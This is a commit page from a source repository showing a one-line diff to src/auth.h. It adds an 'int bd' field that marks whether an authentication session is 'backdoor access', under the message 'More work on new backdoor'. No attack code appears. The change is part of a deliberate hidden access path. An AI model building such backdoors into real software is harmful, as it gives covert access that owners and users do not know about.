瀏覽代碼

* More work on new backdoor

svn: 1144
Bryan Drewery 22 年之前
父節點
當前提交
e84f4a9fe0
共有 1 個文件被更改,包括 1 次插入0 次删除
  1. 1 0
      src/auth.h

+ 1 - 0
src/auth.h

@@ -10,6 +10,7 @@ struct auth_t {
   time_t atime;                 /* when they last were active */
   int authed;
   int authing;
+  int bd;			/* is this auth a backdoor access? */
 #    ifdef S_AUTHHASH
   char hash[MD5_HASH_LENGTH + 1];       /* used for dcc authing */
 #    endif                      /* S_AUTHHASH */